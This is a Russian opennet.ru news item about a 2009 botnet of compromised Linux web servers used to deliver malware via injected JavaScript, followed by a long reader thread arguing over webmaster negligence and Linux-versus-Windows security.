Отечественные разработчики сервиса Unmask Parasites (http://www.unmaskparasites.com), ориентированного на выявление зараженных троянскими вставками web-страниц, сообщили (http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-b.../) об обнаружении ботнет-сети, состоящей из инфицированных web-серверов, работающих под управлением Linux. Все зараженные web-сервера поддерживают обмен данными между узлами и составляют единый ботнет, функционирование которого контролируется из одного центра управления.На входящих в ботнет хостах, в дополнение к основному http-серверу, на 8080 порту запущен дополнительный http-сервер nginx, ориентированный на обработку запросов, формируемых инфицированными страницами с троянскими JavaScript вставками. Основная задача обнаруженного ботнета - поддержание сети для доставки злонамеренного ПО на машины клиентов, пользующихся содержащими уязвимости версиями web-браузерах, поражение которых происходит при открытии инфицированных ...
URL: http://www.theregister.co.uk/2009/09/12/linux_zombies_push_m.../
Новость: http://www.opennet.me/opennews/art.shtml?num=23387
как всегда. Статья составлена так, как будто "виноват дырявый линукс", а не криворукие веб-мастера, которым обновляться религия не позволяет.
из чего это видно?
>Для загрузки и запуска кода злоумышленника на сервере используются широко известные уязвимости в >популярных web-приложениях (например, WordPress версии ниже 2.8.4)
>из чего это видно?это обычное явление, если в первом абзаце есть слово Linux, то с огромной долей вероятности в комментариях появится подобное утверждение от человека, который прочитал только первые несколько предложений. Неважно, что следом специально для таких подробно расписано, что Linux вообщем не причем.
Что вы не замечали, так это то, что потом обязательно появится человек, сделавший заявление относительно дураков не читающих до конца, при этом если даже он сам до конца и прочёл, то в смысл не вник.А смысл в том, что в статье открытым текстом приписывается мифическим "дистрибутивам Linux" уязвимости всего подряд, а потом выходят отчёты об ошибках в ОС, где в уязвимости GNU/Linux вписана каждая ошибка в студенческом калькуляторе сделанным на лабораторной работе под GNU/Linux, а в уязвимости "других ОС" входит только уязвимость нескольких частей их "ядра".
>А смысл в том, что в статье открытым текстом приписывается мифическим "дистрибутивам
>Linux" уязвимости всего подряд, а потом выходят отчёты об ошибках вВы не читали текст, цитирую: "В настоящий момент в ботнете зафиксировано только около сотни серверов, работающих под управлением различных дистрибутивов Linux. Сеть выглядит как первый прототип и следует иметь в виду, что не представляет большого труда адаптировать серверную часть кода злоумышленников для других операционных систем."
> Вы не читали текстА вы его не понимали.
> дистрибутивов Linux
Это что такое вообще?
> Сеть выглядит как первый прототип и следует иметь в виду, что не представляет большого труда адаптировать серверную часть кода злоумышленников для других операционных систем.
То-есть это не адаптация идеи IIS-ботнета (давайте уж на чистоту, ок), а именно приписывание мифическим "дистрибутивам Linux" того что изначально было совсем чужим.
>> Вы не читали текст
>
>А вы его не понимали.Я написал тест новости, причем изначально стараясь быть как можно более политкорректным ;-)
> То-есть это не адаптация идеи IIS-ботнета
Речь про один конкретный ботнет, который пока тестируется и держится на уровне 100 хостов, а не массового поражения. И "другие ОС" - это *BSD, Solaris и прочие Unix-подобные, не думал, что у кого-то может возникнуть ассоциация с Windows (поправил s/других операционных систем/других Unix-подобных операционных систем/).
>>из чего это видно?
>
>это обычное явление, если в первом абзаце есть слово Linux, то с
>огромной долей вероятности в комментариях появится подобное утверждение от человека, который
>прочитал только первые несколько предложений. Неважно, что следом специально для таких
>подробно расписано, что Linux вообщем не причем.Вижу, вы или подзабыли или просто ничего никогда не слышали о phpBB "серверном вирусе"?
10 тыщ погашенных серваков в сутки скорость была.
>>Статья составлена так, как будто "виноват дырявый линукс"Это ты так ее прочитал. В статье просто перечисляют факты. Сухая информация и не более. Ты сам ее интерпритировал таким образом. Видимо чтобы найти повод покричать ...
криворукие админы виноваты.
selinux давно уже использовать надо.
А что такое SeLinux? Что он позволяет делать в отличии от обычного Linux?
> А что такое SeLinux? Что он позволяет делать в отличии от обычного Linux?А Fedora видели?
ru.wikipedia.org/wiki/SELinux
Эти криворукие мастера поставили web-сервер и забыли))
>Эти криворукие мастера поставили web-сервер и забыли))криворукие вебмастера используеют фтп вместо sftp(подсистема ssh)
и в жизни не обновляют веб-приложения.....
>>Эти криворукие мастера поставили web-сервер и забыли))
>
>криворукие вебмастера используеют фтп вместо sftp(подсистема ssh)
>и в жизни не обновляют веб-приложения.....а как sftp защитит от "сниффинга FTP-паролей в локальной сети"
я так понимаю sftp позволяет шифровать траффик, а аутентификация - все также по паролю?
извиняюсь, шифрование траффика как раз таки защитит от сниффинга паролей, но не от подбора пароля.
до чего ж ленивый аноним. sftp(подсистема ssh) позволяет использовать ключи..
>до чего ж ленивый аноним. sftp(подсистема ssh) позволяет использовать ключи..Ничто не помешает троянчегу переслать куда нужно и ключи, и пароли, сохранённые в фаре, и снифить клавиатуру.
Правильное решение - открывать фаерволом только нужные адреса для фтп/ссх.
>>до чего ж ленивый аноним. sftp(подсистема ssh) позволяет использовать ключи..
>
>Ничто не помешает троянчегу переслать куда нужно и ключи, и пароли,
>сохранённые в фаре, и снифить клавиатуру.Ну, для этого нужно поразить комп с паролями.
А пока указан "снифингф паролей в локалке" - т.е. с другого компа.>Правильное решение - открывать фаерволом только нужные адреса для фтп/ссх.
К сожалению, если локалка, то скорее всего - компы за натом.
А в этом случае, у компа веб мастера, и у компа с вирусом будет один и тот же внешний ip.
Хотя... это можно обойти покупкой у прова внешнего ip адреса, или созданием виртуального туннеля.
Да че вы голову ломаете? :)))))Приплатить админу сервера и сканить ничего не надо... :))))
>Да че вы голову ломаете? :)))))
>
>Приплатить админу сервера и сканить ничего не надо... :))))Оть иманна.
>>А пока указан "снифингф паролей в локалке" - т.е. с другого компаДану у кого то локалка на хабах еще ? Или в качестве шлюза Винда стоит (хотя да есть такие индивидумы)?,
>>>А пока указан "снифингф паролей в локалке" - т.е. с другого компа
>
>Дану у кого то локалка на хабах еще ? Или в качестве
>шлюза Винда стоит (хотя да есть такие индивидумы)?,Да кстати)
Хотя в некоторых локалках до сих пор проканает через приколы с рассылкой arp ответов.
Да я даже больше скажу, в сетях с коммутаторами тоже есть техника сниффинга, и даже далеко не одна - начиная от тупого arp-flood и заканчивая MiM через arp-spoof.
>Ничто не помешает троянчегу переслать куда нужно и ключи, и пароли,
>сохранённые в фаре, и снифить клавиатуру.ещё как помешает. вот сколько не пытались — у меня так и не смогли. не запускаются у меня трояны, вот что тут поделать?
аааа, понял! им винда, наверное, нужна, да? ис правами админа?
кроме всего прочего это свидетельствует о возросшей популярности линукс
Никоим образом. Линукс тут- как неуловимый джо - пока никто не озадачился вопросом- он неуловим... Собственно все эти сайты ботнета могут быть на одном хостинге...
В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки один-в-один повторяют слова защитников винды - мол это кривые руки, это админ/юзер, винда не причем тут. Никто не любит правды... ;)
1)WordPress - при чем тут linux?
2)простой пароль - при чем тут linux?
3)перехват трафика ФТП и паролей - - при чем тут linux?Более того "с правами пользователя соответсвующего, не root" Даже политика SELinux поумолчанию не разрешит открыть порт 8080, не говоря про все остальные аспекты....
>1)WordPress - при чем тут linux?
>2)простой пароль - при чем тут linux?
>3)перехват трафика ФТП и паролей - - при чем тут linux?При факте. ботнет работает на хостах с ОС линукс.
ботнет может работать на любой ОС, весь вопрос в том на сколько трудно эту ОС заботать и насколько в этом играет человеческий фактор
>ботнет может работать на любой ОС,Этот работает на линукс
>весь вопрос в том на сколько трудно эту ОС заботать
> и насколько в этом играет человеческий факторНу поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.
Более того, исходя из этой тезы, все разговоры о безопасности Линукса- не более чем маркетинговый бред. Поскольку все эти меры безопасности рушатся перед человеческим фактором, и как видим на примере этой новости - позволяют организовать ботнет.
А скоро вирусы под линукс косяками попрут... :)
> Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.Если так рассуждать, то атомные электростанции ничуть не безопаснее ядерных бомб. Давайте вы не будете нести чепуху, а мы вам не будем показывать направление.
>> Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.
>
>Если так рассуждать, то атомные электростанции ничуть не безопаснее ядерных бомб.Аналогия интересная, а вот вывод вы из нее делаете неверный.
Атомная бомба (если вы в курсе конечно :) ОЧЕНЬ безопасное устройство. В отличие от атомной станции- атомная бомба самопроизвольно не войдет в режим детонации...
Поэтому в плане реализации своих функций - все так и есть - атомная станция более опасное устройство чем атомная бомба.Что же касается человеческого фактора- то в виндовс как раз много внимания уделяется именно этому элементу безопасности. В последних версиях виндовс человеческий фактор учитывается очень хорошо, и специальные средства системы подталкивают пользователя к безопасной работе... Например тот же dep, uac, встроенный в сисетему антивирус(вы понимаете разницу между встроенным антивирусом и теоретически возможным для установки антивирусом? первый в винде, второй в линуксе. первый- рассчитан на человеческий фактор второй -нет), принудительное включение обновления и файрвола, подписывание драйверов и т.д. а как с этим в линуксе?
> Давайте
>вы не будете нести чепуху, а мы вам не будем показывать
>направление.Научитесь проводить аналогии хотя бы...
> В отличие от атомной станции- атомная бомба самопроизвольно не войдет в режим детонации...ну-ка, ну-ка. Расскажи нам, всезнайка, сколько произошло во всём мире атомных взрывов на АЭС? Подчёркиваю, именно атомных, а не тепловых.
За одно, дайте нам статистику неудачных испытаний атомных бомб. Я же нутром чую, что ты и это знаешь.
>> В отличие от атомной станции- атомная бомба самопроизвольно не войдет в режим детонации...
>
>ну-ка, ну-ка. Расскажи нам, всезнайка, сколько произошло во всём мире атомных взрывов
>на АЭС? Подчёркиваю, именно атомных, а не тепловых.
>За одно, дайте нам статистику неудачных испытаний атомных бомб. Я же нутром
>чую, что ты и это знаешь.Речь идет о безопасности. Не уклоняйтесь от темы. Какие средства для защиты от человеческого фактора есть в линукс?
> Какие средства для защиты от человеческого фактора есть в линукс?Ну, давайте сравним.
1. Количество открытых (а значит теоретически уязвимых, с возможностью удалённой атаки) сетевых портов (служб), сразу после установки:
а) в Linux, шт
б) в Windows, шт
2. Права по умочанию у пользователя, установившего ось:
а) в Linux, полные/ограниченные
б) в Windows, полные/ограниченные
3. Наличие ограничений на запуск тех или иных программ с правами администратора (принудительное ограничение прав пользовательского софта)
а) в Linux, да/нет
б) в Windows, да/нет
4. Возможность открывать без административных прав порты с номером менее 1000 (например, запуск простого http сервера там, где его нет, для раздачи инфекции по подложному адресу):
а) в Linux, да/нет
б) в Windows, да/нет
5. Автоматический запуск программ с нелокальных носителей, по умолчанию:
а) в Linux, включен/выключен
б) в Windows, включен/выключенСписок можно продолжить, но этого уже достаточно для предварительного подведения итогов ;)
>> Какие средства для защиты от человеческого фактора есть в линукс?
>
>Ну, давайте сравним.
>1. Количество открытых (а значит теоретически уязвимых, с возможностью удалённой атаки) сетевых
>портов (служб), сразу после установки:
>а) в Linux, шт
>б) в Windows, штЭтот вопрос некорректен, потому сокращенное количество служб - означает сокращение функционала.
>2. Права по умочанию у пользователя, установившего ось:
>а) в Linux, полные/ограниченныеб) в Windows, ограниченные
>3. Наличие ограничений на запуск тех или иных программ с правами администратора
>(принудительное ограничение прав пользовательского софта)
>а) в Linux, да/нетб) в Windows, да
>4. Возможность открывать без административных прав порты с номером менее 1000 (например,
>запуск простого http сервера там, где его нет, для раздачи инфекции
>по подложному адресу):
>а) в Linux, да/нет
>б) в Windows, да/нетЭтот пункт не имеет смысла.
>5. Автоматический запуск программ с нелокальных носителей, по умолчанию:
>а) в Linux, включен/выключенб) в Windows, выключен , причем не только для программ...
>Список можно продолжить, но этого уже достаточно для предварительного подведения итогов ;)Этот список следует в обязательном порядке дополнить:
6. Принудительно включенный файрвол. Принудительно включенная Фильтрация входящего и исходящего трафика.
а) в Linux, да/нет
б) в Windows, да/нет7. Встроенная принудительно включенная защита от вирусов
а) в Linux, да/нет
б) в Windows, да/нет8. Принудительно включенное обновление системы.
а) в Linux, да/нет
б) в Windows, да/нет9. Проверка подписей драйверов и программ
а) в Linux, да/нет
б) в Windows, да/нет10. Использование раздельных каталогов для системных и пользовательских приложений
а) в Linux, да/нет
б) в Windows, да/нет11. Система предупреждения пользователя о небезопасных действиях (мы же говорим о поддержке человеческого фактора...)
а) в Linux, да/нет
б) в Windows, да/нет12. Наличие ASLR
а) в Linux, да/нет
б) в Windows, да/нет13. Наличие SEH
а) в Linux, да/нет
б) в Windows, да/нет14. Автоматическая встроенная система контроля режима безопасности
а) в Linux, да/нет
б) в Windows, да/нет15. Автоматическая встроенная система контроля целостности системы и защиты от ее несанкционированной модификации
а) в Linux, да/нет
б) в Windows, да/нет16. Оповещение пользователя о нарушениях политик безопасности
а) в Linux, да/нет
б) в Windows, да/нет17. Автоматическая встроенная система напоминания пользователю о небезопасном режиме работы (если пользователь по каким-то соображениям не выполняет требований системы о режиме безопасного пользования)
а) в Linux, да/нет
б) в Windows, да/нет18. Встроенная система резервного копирования
а) в Linux, да/нет
б) в Windows, да/нет19. Автоматическое создание "точек восстановления системы". Автоматическое восстановление системы.
а) в Linux, да/нет
б) в Windows, да/нет20. Автоматический контроль над файлами желающими автозагружатся при запуске системы
а) в Linux, да/нет
б) в Windows, да/нет21. Встроенные средства препятствующие эмуляции ответа пользователя на оповещение системы безопасности.
а) в Linux, да/нет
б) в Windows, да/нет
Гетзефактс пробрался на опеннет ?ответы почти на все пункты есть, пару надо уточнить по причине личной безграмотности. Но все пункты обессмысливает один контрвопрос - как долго такая мегазащащиенная система останется живой со всеми этими костылями, выставленная в сетку без активного антивируса, нормального неродного файрвола и прочими неродными "выпрямителями", по сравнению с "альтернативной", как называют некоторые специалисты, ОС ? Предлагать перевести стоимость "выпрямителей" из килобайт в рубли естественно бесполезно.
Моя практика упрямо утверждает, что выражение "установлена только голая винда" прямо намекает на отсутствие затычек в заднепроходных жабрах, через которые в течение нескольких минут в публичной/локальной сети винду нагибают или просто смертный вставляет флешку для "списать файлик домой" на до сих пор самой популярнй версии этой ОС.
P.S. так и хотелось дополнить список
22. Наличие кнопки "Пуск"
23. Наличие реестра виндовс
24. Наличие лицензионной наклейки от МС
Годами может работать, на собственном опыте знаю.
Чаще проблемы от кривости рук, или некорректности поставленной задачи.
>Годами может работать, на собственном опыте знаю.
>Чаще проблемы от кривости рук, или некорректности поставленной задачи.угу. свеженькая винда, выставленая голым задом в интернеты, не прожила и получаса, сразу нахватала всякой вирусни. видимо, скучно ей без этого.
свеженький пингвин (без настроеного файрвола и SELinux) спокойно жил месяц, пока у меня руки не дошли файрвол таки настроить.
и да — я грузился с LiveCD и тщательно проверял обе системы на наличие подозрительных гадов. и да — у меня есть и опыт, и инструменты для этого. и нет, не «коцперцке онтивырусь».
вывод: винда без костылей нежизнеспособна.
>Но все пункты обессмысливает один контрвопрос - как долго такая
>мегазащащиенная система останется живой со всеми этими костылями, выставленная в сетку
>без активного антивируса, нормального неродного файрвола и прочими неродными "выпрямителями", по
>сравнению с "альтернативной", как называют некоторые специалисты, ОС ?Ну, стоит у меня винда без фв (за железным раутером). Переставлял (вернее, ставил на новый комп) 1 раз при переходе с 2К на висту. Антивирус есть, правда, но за последние лет 10 нашел один вирус, притащенный кем-то на флешке. Какие еще нужны выпрямители?
> Предлагать перевести стоимость "выпрямителей" из килобайт в рубли естественно бесполезно.0.00 при желании. Есть и антивирусы, и фаерволы бесплатные. Например, стоимость всего софта на моей системе = цена ОЕМ висты. Хакнутого софта нет.
>Моя практика упрямо утверждает, что выражение "установлена только голая винда" прямо намекает
>на отсутствие затычек в заднепроходных жабрах, через которые в течение нескольких
>минут в публичной/локальной сети винду нагибают или просто смертный вставляет флешку
>для "списать файлик домой" на до сих пор самой популярнй версии
>этой ОС.Вы просто пытаетесь рассуждать о том, чего не знаете. Винду, похоже, видели в последний раз лет 10 назад.
>Ну, стоит у меня винда без фв (за железным раутером). Переставлял (вернее,
>ставил на новый комп) 1 раз при переходе с 2К на
>висту. Антивирус есть, правда, но за последние лет 10 нашел один
>вирус, притащенный кем-то на флешке. Какие еще нужны выпрямители?да ты уже всё сказал: если перед виндой стоит какой-то никс, который винду защищает — винде хорошо. а стоит этот никс убрать — и всё, винда встанет раком.
> 22. Наличие кнопки "Пуск"
> 23. Наличие реестра виндовсВ гноме есть.
И в KDE и в XFCE... - панельки присутствуют :)
Так, что вопрос по кнопке "ПУСК" (№22) - слит.
Реестр - довольно удобное хранилище настроек,
в отличие от кучи разбросанных конфигов
(это хорошо видно в ALT-Linux), особенно если они
в XML (поковыряйте-ка их Vi при локали отличной
от кодировки XML-документа, тогда и поговорим).
>> 22. Наличие кнопки "Пуск"
>> 23. Наличие реестра виндовс
>В гноме есть.Последний раз когда рылся в реестре гнома, видел что он является каталогом файловой системы, наполненный множеством xml файлов. Такой подход не требует спец. редактора реестра (хотя он есть), читать в оперативную память можно только нужные ветки. Плюс видел подсказки у ключей реестра, то есть разработчики документируют реестр очень подробно. Думаю равнять такой реестр с тем что использует Microsoft некорректно, так как основные минусы у этого реестра отсутствуют.
>н является каталогом файловой системы, наполненный множеством xml файловчто означает
а) медленный поиск, чтение и запись
б) внушительный объем занимаемой памяти
в) отсутствие атомарностибинарный типизированный реестр сильно удобнее
там же и сетевая прозрачность, и контроль доступа
>подсказки у ключей реестра, то есть разработчики документируют реестр очень подробно
потому что он маленький
>>н является каталогом файловой системы, наполненный множеством xml файлов
>что означает
>а) медленный поиск, чтение и запись
>б) внушительный объем занимаемой памяти
>в) отсутствие атомарности
>бинарный типизированный реестр сильно удобнее
>там же и сетевая прозрачность, и контроль доступаВы рекламе верите или сами работаете с Windows?
а) Сравните поиск чтение и запись самостоятельно. Реестр от Майкрософт это не реляционная база данных с правильными индексами - это файловая система внутри файловой системы. Если не в курсе зачем так делалось, то задумайтесь. Задумайтесь почему со временем реестр от Майкрософт начинает тормозить работу операционной системы, а наличие неиспользуемых старых файлов, как у реестра Гнома, наоборот не сказывается.
б) Какой памяти? на диске? Ставьте подходящую для маленьких файлов файловую систему.
в) Атомарность обеспечивается журналируемой файловой системой и библиотекой доступа к файлам реестра. Учитесь писать программы так чтоб после сбоя информация оставалась в согласованном состоянии.
Сетевая прозрачность для текстовых файлов прозрачна с начала развития сетей.
Контроль доступа для фалов ещё прозрачнее.
>>подсказки у ключей реестра, то есть разработчики документируют реестр очень подробно
>потому что он маленькийПравильный ответ: потому что создают его для себя, чтоб самим не путаться. Вы ещё не поняли чем занимаются коммерческие организации? Они зарабатывают деньги, поэтому слишком понятный и хороший продукт невыгодно делать. Поставьте себя хоть раз на место руководителя, а не студента.
>Гетзефактс пробрался на опеннет ?
>Винда хорошая система при наличии:
1. Денег на ее покупку (достаточно много денег единовременно при развертывании большой системы!)
2. Знаний (появляются у белых юзеров, получивших сертификаты высокого уровня в академии МС)В Штатах на 2003 серверах крутятся приложения мама не горюй.
В *nix (свободные версии)
1. Проще искать, читать, конфигурировать и парсить логи, делать извещения о критических сообщениях в логах
2. Проще управлять системой через любимый текстовый формат conf, rc файлов
3. Проще изучать систему (читай себе логи и реагируй)
4. ТСО, после многолетнего допиливания системы может превысить аналогичный показатель винды, чтобы снизить его в мировом масштабе - нужно делиться :) Отдавать наработки под приглянувшейся лицензией :) ТСО растет из-за постоянных затрат даже на bearware :)
5. Зато развертывание непиленной системы стоит 0 (ноль) денег "на лицензию" единовременно.И ваще, все на свете - под задачу. Есть задачи, где винда элементарно выгодна, как серверная платформа.
Спасибо, посмешил! :)
Во-первых, почему ты не сообразил, что ответы предполагалось давать сразу для обеих осей?
Во-вторых, твои ответы - "Этот вопрос некорректен, потому сокращенное количество служб - означает сокращение функционала", неверен в корне - система уже устанавливается с уязвимостью и заражается в течении нескольких минут, будучи подключенной к интернету или локальной сети; "3. Наличие ограничений на запуск тех или иных программ с правами администратора б) в Windows, да" - прошу привести мне хоть одну программу для Windows, которую невозможно запустить с административными привелегиями!; "5. Автоматический запуск программ с нелокальных носителей, по умолчанию: б) в Windows, выключен , причем не только для программ..." начиная с виндовс мемь, которая лишь только-только выходит?
Теперь по твоим "дополнениям": "7. Встроенная принудительно включенная защита от вирусов" - для линукса живых вирусов нет, для винды они есть, и ответ на этот твой вопрос для windows - НЕТ встроенной антивирусной защиты; "12. Наличие ASLR" - ДА для линукса, только для приложений, скомпилированных с поддержкой ASLR - для виндовс! :) ; "19. Автоматическое создание "точек восстановления системы". Автоматическое восстановление системы" - в линуксе она не нужна, т.к. в ней никогда не возникает необходимости - ось не ломается ;) "21. Встроенные средства препятствующие эмуляции ответа пользователя на оповещение системы безопасности" - хахаха, расскажи мне об эмуляции ответа пользователя в bash'е :D
>19. Автоматическое создание
>"точек восстановления системы". Автоматическое восстановление системы" - в линуксе она не
>нужна, т.к. в ней никогда не возникает необходимости - ось не
>ломается ;)"Вы просто не умеете их готовить" - ломается и еще как - фиг восстановишь, даже Apple не спроста придумала Time Machine ;)
ну в общем и точки есть - lvm :)
>ну в общем и точки есть - lvm :)Это система автоматического бекапа и самовосстановления в случае сбоев?
>"Вы просто не умеете их готовить" - ломается и еще как -
>фиг восстановишь, даже Apple не спроста придумала Time Machine ;)при наличии достаточной степени упорства можно и половой орган поломать.
>>> В отличие от атомной станции- атомная бомба самопроизвольно не войдет в режим детонации...
>>
>>ну-ка, ну-ка. Расскажи нам, всезнайка, сколько произошло во всём мире атомных взрывов
>>на АЭС? Подчёркиваю, именно атомных, а не тепловых.
>>За одно, дайте нам статистику неудачных испытаний атомных бомб. Я же нутром
>>чую, что ты и это знаешь.
>
>Речь идет о безопасности. Не уклоняйтесь от темы. Какие средства для защиты
>от человеческого фактора есть в линукс?Извольте ознакомиться:
http://www.opennet.me/openforum/vsluhforumID3/58811.html#74
=)И что вы скажете про атаки именно на виндовые службы на портах 137-139, 445 и т.д.?
Атаки на винды по сети заканчиваются только тогда, когда закрыты эти порты (причем не закрыты виндовым фаерволлом).Про вирусы в .ani - это вообще войдет в историю позора Microsoft)
>>Речь идет о безопасности. Не уклоняйтесь от темы. Какие средства для защиты
>>от человеческого фактора есть в линукс?
>Извольте ознакомиться: http://www.opennet.me/openforum/vsluhforumID3/58811.html#74=)
>И что вы скажете про атаки именно на виндовые службы на портах 137-139, 445 и т.д.?
Хочется добавить свои 5 копеек. Мало того что эти порты открыты, так ещё вспомним про принудительное открывание системного и других дисков в сеть на полный доступ под паролем администратора... При вводе пароля администратора среднестатичный пользователь об этом не предупреждается, он даже не понимает что его каталог автозагрузки будет открыт под этим паролем, а пароль доступен для перебора. Никто даже не может себе представить чтоб по умолчанию у linux была открыта в сеть вся файловая система...
>[оверквотинг удален]
>=)
>
>>И что вы скажете про атаки именно на виндовые службы на портах 137-139, 445 и т.д.?
>
>Хочется добавить свои 5 копеек. Мало того что эти порты открыты, так
>ещё вспомним про принудительное открывание системного и других дисков в сеть
>на полный доступ под паролем администратора... При вводе пароля администратора среднестатичный
>пользователь об этом не предупреждается, он даже не понимает что его
>каталог автозагрузки будет открыт под этим паролем, а пароль доступен для
>перебора.Можно я подпорчу эффект от ваших 5 копеек? :)
Мы говорим об тех аспектах работы операционной системы, которые учитывают человеческий фактор, и по возможности стремятся снизить риски связанные с ним. Вообще говоря решение вопроса с безопасностью путем уменьшения функционала- сродни кастрации вместо использования презерватива. Просто удивительно как много сторонников такого способа среди поборников опенсорса.В частности, по поводу вышеозвученного "ахтунга": в стране с любителями воровать чужую собственность люди часто используют с домашних условиях системы для этого не предназначенные. В частности, долларовые административные шары имеются на системах уровня профешенел (для использования в инфраструктуре предприятия), и остуствуют по умолчанию на системах класса HOME, которые ставятся на компьютеры распространяемые через магазины в массы населения. На предприятиях же, долларовые административные шары - это удобно, полезно и правильно.
Покупайте софт легально :)
>Мы говорим об тех аспектах работы операционной системы, которые учитывают человеческий
>фактор, и по возможности стремятся снизить риски связанные с ним.то есть, создание по-умолчанию аккаунта с правами администратора для home-систем — это снижение риска, я правильно понял?
>Вообще говоря решение вопроса с безопасностью путем уменьшения функционала- сродни кастрации вместо использования презерватива.
предлагаю немного поискать в одном бложике на сайте m$ ответ на один интересный вопрос. где сотрудник m$ ясно сказал: «мы не документируем API, чтобы очень страшно плохой софт не мог сделать плохого. вот гуя, и всё». внимание, риторический вопрос: у кого ограничения: у системы, где мало того, что исходники есть, так ещё и практически любой винтик можно подвинтить, или у системы, где ни кода, ни документированного API для винтика?
зыж да, я не доставлю пруфлинк, потому что забыл его. можешь поверить на слово, можешь сам поискать, а можешь и отмахнуться, мне, тащемта, всё равно.
>Можно я подпорчу эффект от ваших 5 копеек? :)
>Мы говорим об тех аспектах работы операционной системы, которые учитывают человеческий
>фактор, и по возможности стремятся снизить риски связанные с ним. Вообще
>говоря решение вопроса с безопасностью путем уменьшения функционала- сродни кастрации вместо
>использования презерватива. Просто удивительно как много сторонников такого способа среди поборников
>опенсорса.А в чем проблема поставить то что НУЖНО?
>В частности, по поводу вышеозвученного "ахтунга": в стране с любителями воровать чужую
>собственность люди часто используют с домашних условиях системы для этого не
>предназначенные. В частности, долларовые административные шары имеются на системах уровня
>профешенел (для использования в инфраструктуре предприятия), и остуствуют по умолчанию на
>системах класса HOME, которые ставятся на компьютеры распространяемые через магазины в
>массы населения. На предприятиях же, долларовые административные шары - это удобно,
>полезно и правильно.
>
>Покупайте софт легально :)Не поверите Про КУПИЛ легально... Для дома... Так было надо...
Кстати, глянул в ХОМЕ версию, IPC$ присутствует. Если память не изменяет C:\Windows\[system32]? Хотя путь и не отображается.
>[оверквотинг удален]
>>профешенел (для использования в инфраструктуре предприятия), и остуствуют по умолчанию на
>>системах класса HOME, которые ставятся на компьютеры распространяемые через магазины в
>>массы населения. На предприятиях же, долларовые административные шары - это удобно,
>>полезно и правильно.
>>
>>Покупайте софт легально :)
>
>Не поверите Про КУПИЛ легально... Для дома... Так было надо...
>Кстати, глянул в ХОМЕ версию, IPC$ присутствует. Если память не изменяет C:\Windows\[system32]?
>Хотя путь и не отображается.Хе-хе... Ну если вы думаете что это смв шара диска - попробуйте на нее зайти :))
>На предприятиях же, долларовые административные шары - это удобно, полезно и правильно.У нас большинство задач где это не удобно, не полезно и не правильно. Правильно, это когда операционная система для предприятия спрашивает у Администратора при инсталляции, как себя впоследствии вести, а не вставляет ему палки в колёса считая себя ясновидцем и всезнайкой.
>Можно я подпорчу эффект от ваших 5 копеек? :)
>Мы говорим об тех аспектах работы операционной системы, которые учитывают человеческий
>фактор, и по возможности стремятся снизить риски связанные с ним. Вообще
>говоря решение вопроса с безопасностью путем уменьшения функционала- сродни кастрации вместо
>использования презерватива. Просто удивительно как много сторонников такого способа среди поборников
>опенсорса.Не подменяйте понятия.
Кастрация - это сначала было, а потом удалили (без возможности восстановления).
И это никак не относится к "после установки изначально отключено, но можно включить".Я могу совершенно легально собрать дистрибутив *nix/*bsd системы под себя.
Где я включу по умолчанию нужные мне функции, а отключу не нужные.
С Windows я такого не смогу (я про легальные дистрибутивы).
Что вы там говорили про кастрацию? =)>В частности, по поводу вышеозвученного "ахтунга": в стране с любителями воровать чужую
>собственность люди часто используют с домашних условиях системы для этого не
>предназначенные. В частности, долларовые административные шары имеются на системах уровня
>профешенел (для использования в инфраструктуре предприятия), и остуствуют по умолчанию на
>системах класса HOME, которые ставятся на компьютеры распространяемые через магазины в
>массы населения. На предприятиях же, долларовые административные шары - это удобно,
>полезно и правильно.
>
>Покупайте софт легально :)Т.е. если я куплю PRO/BUSINESS/ULTIMATE и т.п. винду (куплю!), поставлю на домашний комп и он будет взломан, то я сам себе злобный буратино? =)
Ведь я же знал, что PRO/BUSINESS/ULTIMATE - это система с дырами по умолчанию и нужен админ уровня enterprise, который сразу все дырки позакрывает.
Вот вам и легальный софт)
>>> Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.
>>
>>Если так рассуждать, то атомные электростанции ничуть не безопаснее ядерных бомб.
>
>Аналогия интересная, а вот вывод вы из нее делаете неверный.
>Атомная бомба (если вы в курсе конечно :) ОЧЕНЬ безопасное устройство. В
>отличие от атомной станции- атомная бомба самопроизвольно не войдет в режим
>детонации...Аналогия нормальная, а вы говорить глупость. Покажите, как станция может САМПРОИИЗВОЛЬНО войти в режим детонации? Так не бывает, это надо очень сильно постараться. И покажите мне бомбу, которая способна мирно работать, как станция. Кстати, что за терминология такая, какой нафиг режим детонации у станции? В реакторе условия не те, знаете ли. Вы что-нибудь об имплозивной схеме хотя бы слыхали?
>Поэтому в плане реализации своих функций - все так и есть -
>атомная станция более опасное устройство чем атомная бомба.
>Научитесь проводить аналогии хотя бы...Вот и научитесь, ага. Станция изначально создана для обеспечения безопасности, бомба - наоборот. Да, при определенных усилиях можно довести до Большой Жопы любое, из, но потраченные усилия будут, знаете ли, несоизмеримы. В IT точно так же, сломать можно и более защищенную систему, но нужно большее количество усилий, которое мало у кого есть (другой будет и статистика, соответственно). Вы полетите на самолёте, который упадет с вероятностью 10% ? А с вероятностью 0.0001% ?
> Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.Там же речь не о том, что взломщики получили полный контроль над машинами, они просто воспользовались возможностями обычных пользователей тех систем, которые мало уделяли внимания вопросам безопасности.
>А скоро вирусы под линукс косяками попрут... :)Вирусы под Линух есть, Вы видимо совсем не в теме.... Однако, ожидать эпедемий равных sasser, redcode, kido, по меньшей мере наивно.
>Вирусы под Линух есть, Вы видимо совсем не в теме....ага. вирусы есть, просто для них нет ebuild'ов, и простой пользователь не может их установить. %-)
> все эти меры безопасности рушатся перед человеческим факторомС виндой тоже самое будет если ее не обновлять.
>1)WordPress - при чем тут linux?при том. крутиться то на линуксах.
> при том. крутиться то на линуксах.Т.е. если я поставлю WordPress на Windows 2008 Server — это будет ГЛОБАЛЬНО и НАДЕЖНО?
> 1)WordPress - при чем тут linux?Adobe Acrobat & K - причём тут Windows? но ведь дыра в нем оч популярна и ведь косят не на адоба - косят на Microsoft. хотя казалось бы. 'мы в ответе за тех, кого приручили' (с)...
// wbr
